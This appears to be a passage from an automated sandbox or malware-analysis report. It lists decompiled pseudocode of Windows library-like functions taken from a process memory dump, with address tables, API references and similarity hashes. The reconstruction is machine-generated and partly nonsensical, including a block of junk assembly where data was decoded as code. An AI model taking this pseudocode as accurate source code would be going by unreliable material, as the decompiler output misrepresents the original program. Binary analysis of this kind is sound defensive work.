								_t91 = E0540E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E0540A890() != 0) {
					goto L6;
				}
				goto L3;
			}

0x053cb171
0x053cb171
0x053cb171
0x053cb171
0x053cb171
0x053cb176
0x053cb17b
0x053cb180
0x053cb186
0x053cb18f
0x053cb198
0x053cb1a4
0x053cb1aa
0x05424802
0x05424802
0x05424805
0x0542480c
0x0542480e
0x053cb1d1
0x053cb1d3
0x053cb1de
0x053cb1de
0x05424817
0x0542481e
0x05424820
0x05424822
0x05424822
0x05424824
0x05424824
0x0542482a
0x00000000
0x00000000
0x05424835
0x0542483a
0x0542483d
0x0542483f
0x05424842
0x05424842
0x05424842
0x05424846
0x0542484c
0x0542484e
0x05424851
0x05424851
0x05424853
0x05424854
0x05424854
0x05424858
0x0542485a
0x0542485a
0x0542485d
0x0542485f
0x05424861
0x05424861
0x05424866
0x0542486b
0x0542486e
0x05424871
0x05424876
0x05424876
0x05424878
0x0542487b
0x05424884
0x05424884
0x00000000
0x0542487d
0x0542487d
0x05424882
0x05424889
0x05424889
0x0542488f
0x05424891
0x054248e0
0x054248e2
0x054248e4
0x054248e4
0x054248e7
0x054248e7
0x054248ed
0x054248f4
0x054248f6
0x05424951
0x05424951
0x05424953
0x05424953
0x05424956
0x05424956
0x05424958
0x05424959
0x05424959
0x0542495d
0x0542495d
0x0542495f
0x0542495f
0x05424965
0x05424969
0x054249ba
0x054249ba
0x054249c1
0x054249c5
0x054249cc
0x054249d4
0x054249d7
0x054249da
0x054249e4
0x054249e5
0x054249f3
0x05424a02
0x00000000
0x05424a02
0x05424972
0x05424974
0x00000000
0x00000000
0x05424976
0x05424979
0x05424982
0x05424983
0x05424984
0x0542498b
0x0542498d
0x05424991
0x05424993
0x05424999
0x0542499d
0x054249a2
0x054249a2
0x054249a2
0x05424999
0x054249ac
0x00000000
0x054249b3
0x054248f8
0x054248fe
0x00000000
0x00000000
0x00000000
0x054248fe
0x05424895
0x0542489c
0x054248ad
0x054248b2
0x054248b5
0x054248b7
0x054248ba
0x054248bc
0x054248c6
0x054248c6
0x054248cb
0x054248d1
0x054248d4
0x054248d8
0x054248d8
0x00000000
0x054248d8
0x054248be
0x054248c0
0x00000000
0x00000000
0x054248c2
0x00000000
0x00000000
0x00000000
0x054248c4
0x00000000
0x05424882
0x0542487b
0x05424904
0x05424906
0x00000000
0x00000000
0x05424908
0x0542490e
0x00000000
0x00000000
0x05424910
0x05424917
0x05424917
0x00000000
0x05424917
0x053cb1ba
0x054247f9
0x054247fc
0x00000000
0x00000000
0x00000000
0x054247fc
0x053cb1c0
0x053cb1c0
0x053cb1c3
0x053cb1cb
0x00000000
0x00000000
0x00000000

APIs

_vswprintf_s.LIBCMT ref: 054248AD

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID: _vswprintf_s
String ID:
API String ID: 677850445-0
Opcode ID: 5a5cdee2117de5698d253f3dd2204285b9bbc32a12a200ef33a09e94847b7327
Instruction ID: e411cce1c19ba3a7153f1ec09d6b46b95ea4b256fe8a4177cebe8ca8280e9f8a
Opcode Fuzzy Hash: 5a5cdee2117de5698d253f3dd2204285b9bbc32a12a200ef33a09e94847b7327
Instruction Fuzzy Hash: 1151DB75E102798ADF25CF788845BFEBBB2FF00720F6041AEE859AB681D77049458B90

Uniqueness

Uniqueness Score: -1.00%

Function 053EB944, Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E053EB944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x54bd360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E053E7D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E05498CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E05409E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E0540B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E0540CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E053E7D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E05498F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E0540AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x54b8628; // 0x0
								_v68 = _t77;
								_t78 =  *0x54b862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x54b8628; // 0x0
							_t116 =  *0x54b862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}

0x053eb94c
0x053eb956
0x053eb95c
0x053eb95e
0x053eb964
0x053eb969
0x053eb96d
0x053eb96d
0x053eb970
0x053eb974
0x053eb97a
0x053ebadf
0x053ebadf
0x053ebae2
0x053ebae4
0x053ebae6
0x053ebaf0
0x05432cb8
0x053ebaf6
0x053ebaf6
0x053ebaf6
0x053ebafd
0x053ebb1f
0x053ebb1f
0x053ebaff
0x053ebb00
0x053ebb00
0x053ebb03
0x053ebb03
0x053ebacb
0x053ebacf
0x053ebad0
0x053ebad1
0x053ebadc
0x053ebadc
0x053eb980
0x053eb980
0x053eb988
0x053eb98b
0x053eb98d
0x053eb990
0x053eb993
0x053eb999
0x053eb99b
0x053eb9a1
0x053eb9a5
0x053eb9aa
0x053eb9b0
0x053eb9bb
0x053eb9c0
0x053eb9c3
0x053eb9ca
0x053eb9cc
0x053eb9cf
0x053eb9d3
0x053eb9d7
0x053eba94
0x053eba94
0x053eba98
0x053ebaa3
0x05432ccb
0x053ebaa9
0x053ebaa9
0x053ebaa9
0x053ebab1
0x05432cd5
0x05432cdd
0x05432cdd
0x053ebabb
0x053ebabc
0x053ebac2
0x053ebac3
0x053ebac3
0x053ebac6
0x00000000
0x053eb9dd
0x053eb9dd
0x053eb9e7
0x053eb9e7
0x053eb9ec
0x053eb9ec
0x053eb9f1
0x053eb9f5
0x053eb9fa
0x053eba00
0x053eba0c
0x053eba10
0x053eba10
0x053eba12
0x053eba18
0x00000000
0x00000000
0x053ebb26
0x053ebb26
0x053eba1e
0x053eba1e
0x053eba23
0x053eba25
0x053eba2c
0x053eba30
0x053eba35
0x053eba35
0x053eba41
0x053eba46
0x053eba4c
0x053eba50
0x053eba54
0x053eba6a
0x053eba6e
0x053eba70
0x053eba74
0x053eba78
0x053eba7a
0x053eba7c
0x053eba8e
0x053eba90
0x053eba92
0x053ebb14
0x053ebb14
0x053ebb16
0x053ebb16
0x00000000
0x053eba7c
0x053ebb0a
0x053ebb0d
0x00000000
0x00000000
0x00000000
0x053ebb0f

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 053EB9A5

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 885266447-0
Opcode ID: 49174064a677b2596d80ac3d82b96b6da6e710807dae2be9602ae35a5990ad42
Instruction ID: 8c7b687736667e89b64886dd8a549dbccef394321caba5484df5c08fe1ef9977
Opcode Fuzzy Hash: 49174064a677b2596d80ac3d82b96b6da6e710807dae2be9602ae35a5990ad42
Instruction Fuzzy Hash: 97515971A08351CFCB25CF29C09192BFBEAFB88610F24896EF58597794D770E844CB92

Uniqueness

Uniqueness Score: -1.00%

Function 053F2581, Relevance: 1.6, Strings: 1, Instructions: 329
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E053F2581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				void* _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t229;
				signed int _t233;
				signed int _t248;
				signed int _t250;
				intOrPtr _t252;
				signed int _t255;
				signed int _t262;
				signed int _t265;
				signed int _t273;
				signed int _t279;
				signed int _t281;
				void* _t283;
				void* _t284;
				void* _t285;
				signed int _t286;
				unsigned int _t289;
				signed int _t293;
				signed int _t295;
				signed int _t299;
				intOrPtr _t312;
				signed int _t321;
				signed int _t323;
				signed int _t324;
				signed int _t328;
				signed int _t329;
				void* _t332;
				signed int _t333;
				signed int _t335;
				signed int _t337;
				void* _t338;
				void* _t340;

				_t335 = _t337;
				_t338 = _t337 - 0x4c;
				_v8 =  *0x54bd360 ^ _t335;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t328 = 0x54bb2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t289 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t340 = (_v24 >> 0x0000001c & 0x00000003) - 1;
				_t279 = 0x48;
				_t309 = 0 | _t340 == 0x00000000;
				_t321 = 0;
				_v37 = _t340 == 0;
				if(_v48 <= 0) {
					L16:
					_t45 = _t279 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t329 = 0xc0000106;
						goto L32;
					} else {
						_t328 = L053E4620(_t289,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t279);
						_v52 = _t328;
						__eflags = _t328;
						if(_t328 == 0) {
							_t329 = 0xc0000017;
							goto L32;
						} else {
							 *(_t328 + 0x44) =  *(_t328 + 0x44) & 0x00000000;
							_t50 = _t328 + 0x48; // 0x48
							_t323 = _t50;
							_t309 = _v32;
							 *(_t328 + 0x3c) = _t279;
							_t281 = 0;
							 *((short*)(_t328 + 0x30)) = _v48;
							__eflags = _t309;
							if(_t309 != 0) {
								 *(_t328 + 0x18) = _t323;
								__eflags = _t309 - 0x54b8478;
								 *_t328 = ((0 | _t309 == 0x054b8478) - 0x00000001 & 0xfffffffb) + 7;
								E0540F3E0(_t323,  *((intOrPtr*)(_t309 + 4)),  *_t309 & 0x0000ffff);
								_t309 = _v32;
								_t338 = _t338 + 0xc;
								_t281 = 1;
								__eflags = _a8;
								_t323 = _t323 + (( *_t309 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t273 = E054539F2(_t323);
									_t309 = _v32;
									_t323 = _t273;
								}
							}
							_t293 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t329 = _v68;
								__eflags = 0;
								 *((short*)(_t323 - 2)) = 0;
								goto L32;
							} else {
								_t279 = _t328 + _t281 * 4;
								_v56 = _t279;
								do {
									__eflags = _t309;
									if(_t309 != 0) {
										_t229 =  *(_v60 + _t293 * 4);
										__eflags = _t229;
										if(_t229 == 0) {
											goto L30;
										} else {
											__eflags = _t229 == 5;
											if(_t229 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t279 =  *(_v60 + _t293 * 4);
										 *(_t279 + 0x18) = _t323;
										_t233 =  *(_v60 + _t293 * 4);
										__eflags = _t233 - 8;
										if(_t233 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t233 * 4 +  &M053F2959))) {
												case 0:
													__ax =  *0x54b8488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E0540F3E0(__edi,  *0x54b848c, __ax & 0x0000ffff);
														__eax =  *0x54b8488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E0540F3E0(_t323, _v80, _v64);
													_t268 = _v64;
													goto L26;
												case 2:
													 *0x54b8480 & 0x0000ffff = E0540F3E0(__edi,  *0x54b8484,  *0x54b8480 & 0x0000ffff);
													__eax =  *0x54b8480 & 0x0000ffff;
													__eax = ( *0x54b8480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E0540F3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E0540F3E0(_t323, _v76, _v36);
														_t268 = _v36;
													}
													L26:
													_t338 = _t338 + 0xc;
													_t323 = _t323 + (_t268 >> 1) * 2 + 2;
													__eflags = _t323;
													L27:
													_push(0x3b);
													_pop(_t270);
													 *((short*)(_t323 - 2)) = _t270;
													goto L28;
												case 6:
													__ebx =  *0x54b575c;
													__eflags = __ebx - 0x54b575c;
													if(__ebx != 0x54b575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E0540F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0x54b575c;
														} while (__ebx != 0x54b575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x54b8478 & 0x0000ffff = E0540F3E0(__edi,  *0x54b847c,  *0x54b8478 & 0x0000ffff);
													__eax =  *0x54b8478 & 0x0000ffff;
													__eax = ( *0x54b8478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E054539F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x54b6e58 & 0x0000ffff = E0540F3E0(__edi,  *0x54b6e5c,  *0x54b6e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x54b6e58 & 0x0000ffff;
													__eax = ( *0x54b6e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t293 = _v16;
													_t309 = _v32;
													L29:
													_t279 = _t279 + 4;
													__eflags = _t279;
													_v56 = _t279;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t293 = _t293 + 1;
									_v16 = _t293;
									__eflags = _t293 - _v48;
								} while (_t293 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t233 =  *(_v60 + _t321 * 4);
						if(_t233 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t233 * 4 +  &M053F2935))) {
							case 0:
								__ax =  *0x54b8488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t309 =  &_v64;
								_v80 = E053F2E3E(0,  &_v64);
								_t279 = _t279 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x54b8480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x54b8480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E053DEEF0(0x54b79a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E053DEB70(__ecx, 0x54b79a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t207 = _v72;
											__eflags = _t207;
											if(_t207 != 0) {
												L053E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t207);
											}
											_t208 = _v52;
											__eflags = _t208;
											if(_t208 != 0) {
												__eflags = _t329;
												if(_t329 < 0) {
													L053E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t208);
													_t208 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t289 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x54b7b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L053E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E053DEB70(__ecx, 0x54b79a0);
										__eax = _v52;
										L36:
										_pop(_t322);
										_pop(_t330);
										__eflags = _v8 ^ _t335;
										_pop(_t280);
										return E0540B640(_t208, _t280, _v8 ^ _t335, _t309, _t322, _t330);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t275 = _v56;
								if(_v56 != 0) {
									_t309 =  &_v36;
									_t277 = E053F2E3E(_t275,  &_v36);
									_t289 = _v36;
									_v76 = _t277;
								}
								if(_t289 == 0) {
									goto L44;
								} else {
									_t279 = _t279 + 2 + _t289;
								}
								goto L14;
							case 6:
								__eax =  *0x54b5764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x54b8478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x54b8478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x54b6e58 & 0x0000ffff;
								__eax = ( *0x54b6e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t321 = _t321 + 1;
								if(_t321 >= _v48) {
									goto L16;
								} else {
									_t309 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					asm("int 0x29");
					asm("out 0x28, al");
					asm("aas");
					asm("loopne 0x29");
					asm("aas");
					 *_t323 =  *_t323 - _t279;
					ds = 0x25;
					_pop(_t283);
					_t284 = _t283 + 1;
					 *_t323 =  *_t323 - _t323;
					asm("aas");
					_t332 = _t328 + 1 - 1;
					 *_t323 =  *_t323 - _t284;
					asm("fcomp dword [ebx+0x43]");
					_t285 = _t284 + 1;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x549ff00);
					E0541D08C(_t285, _t323, _t332);
					_v44 =  *[fs:0x18];
					_t324 = 0;
					 *_a24 = 0;
					_t286 = _a12;
					__eflags = _t286;
					if(_t286 == 0) {
						_t248 = 0xc0000100;
					} else {
						_v8 = 0;
						_t333 = 0xc0000100;
						_v52 = 0xc0000100;
						_t250 = 4;
						while(1) {
							_v40 = _t250;
							__eflags = _t250;
							if(_t250 == 0) {
								break;
							}
							_t299 = _t250 * 0xc;
							_v48 = _t299;
							__eflags = _t286 -  *((intOrPtr*)(_t299 + 0x53a1664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t265 = E0540E5C0(_a8,  *((intOrPtr*)(_t299 + 0x53a1668)), _t286);
									_t338 = _t338 + 0xc;
									__eflags = _t265;
									if(__eflags == 0) {
										_t333 = E054451BE(_t286,  *((intOrPtr*)(_v48 + 0x53a166c)), _a16, _t324, _t333, __eflags, _a20, _a24);
										_v52 = _t333;
										break;
									} else {
										_t250 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t250 = _t250 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t333;
						__eflags = _t333;
						if(_t333 < 0) {
							__eflags = _t333 - 0xc0000100;
							if(_t333 == 0xc0000100) {
								_t295 = _a4;
								__eflags = _t295;
								if(_t295 != 0) {
									_v36 = _t295;
									__eflags =  *_t295 - _t324;
									if( *_t295 == _t324) {
										_t333 = 0xc0000100;
										goto L76;
									} else {
										_t312 =  *((intOrPtr*)(_v44 + 0x30));
										_t252 =  *((intOrPtr*)(_t312 + 0x10));
										__eflags =  *((intOrPtr*)(_t252 + 0x48)) - _t295;
										if( *((intOrPtr*)(_t252 + 0x48)) == _t295) {
											__eflags =  *(_t312 + 0x1c);
											if( *(_t312 + 0x1c) == 0) {
												L106:
												_t333 = E053F2AE4( &_v36, _a8, _t286, _a16, _a20, _a24);
												_v32 = _t333;
												__eflags = _t333 - 0xc0000100;
												if(_t333 != 0xc0000100) {
													goto L69;
												} else {
													_t324 = 1;
													_t295 = _v36;
													goto L75;
												}
											} else {
												_t255 = E053D6600( *(_t312 + 0x1c));
												__eflags = _t255;
												if(_t255 != 0) {
													goto L106;
												} else {
													_t295 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t333 = E053F2C50(_t295, _a8, _t286, _a16, _a20, _a24, _t324);
											L76:
											_v32 = _t333;
											goto L69;
										}
									}
									goto L108;
								} else {
									E053DEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t333 = _a24;
									_t262 = E053F2AE4( &_v36, _a8, _t286, _a16, _a20, _t333);
									_v32 = _t262;
									__eflags = _t262 - 0xc0000100;
									if(_t262 == 0xc0000100) {
										_v32 = E053F2C50(_v36, _a8, _t286, _a16, _a20, _t333, 1);
									}
									_v8 = _t324;
									E053F2ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t248 = _t333;
					}
					L70:
					return E0541D0D1(_t248);
				}
				L108:
			}

0x053f2584
0x053f2586
0x053f2590
0x053f2596
0x053f2597
0x053f2598
0x053f2599
0x053f259e
0x053f25a4
0x053f25a9
0x053f25ac
0x053f25ae
0x053f25b1
0x053f25b2
0x053f25b5
0x053f25b8
0x053f25bb
0x053f25bc
0x053f25bf
0x053f25c2
0x053f25c5
0x053f25c6
0x053f25cb
0x053f25ce
0x053f25d8
0x053f25db
0x053f25dd
0x053f25de
0x053f25e1
0x053f25e3
0x053f25e9
0x053f26da
0x053f26da
0x053f26dd
0x053f26e2
0x05435b56
0x00000000
0x053f26e8
0x053f26f9
0x053f26fb
0x053f26fe
0x053f2700
0x05435b60
0x00000000
0x053f2706
0x053f2706
0x053f270a
0x053f270a
0x053f270d
0x053f2713
0x053f2716
0x053f2718
0x053f271c
0x053f271e
0x05435b6c
0x05435b6f
0x05435b7f
0x05435b89
0x05435b8e
0x05435b93
0x05435b96
0x05435b9c
0x05435ba0
0x05435ba3
0x05435bab
0x05435bb0
0x05435bb3
0x05435bb3
0x05435ba3
0x053f2724
0x053f2726
0x053f2729
0x053f272c
0x053f279d
0x053f279d
0x053f27a0
0x053f27a2
0x00000000
0x053f272e
0x053f272e
0x053f2731
0x053f2734
0x053f2734
0x053f2736
0x05435bc1
0x05435bc1
0x05435bc4
0x00000000
0x05435bca
0x05435bca
0x05435bcd
0x00000000
0x05435bd3
0x00000000
0x05435bd3
0x05435bcd
0x053f273c
0x053f273c
0x053f2742
0x053f2747
0x053f274a
0x053f274d
0x053f2750
0x00000000
0x053f2756
0x053f2756
0x00000000
0x053f2902
0x053f2908
0x053f290b
0x00000000
0x053f2911
0x053f291c
0x053f2921
0x00000000
0x053f2921
0x00000000
0x00000000
0x053f2880
0x053f2887
0x053f288c
0x00000000
0x00000000
0x053f2805
0x053f280a
0x053f2814
0x053f2816
0x00000000
0x00000000
0x053f281e
0x053f2821
0x053f2823
0x00000000
0x053f2829
0x053f2829
0x053f2831
0x053f283c
0x053f283e
0x00000000
0x053f283e
0x00000000
0x00000000
0x053f284e
0x053f2850
0x053f2851
0x053f2854
0x053f2857
0x053f285a
0x053f285c
0x053f285d
0x00000000
0x00000000
0x053f275d
0x053f2761
0x00000000
0x053f2767
0x053f276e
0x053f2773
0x053f2773
0x053f2776
0x053f2778
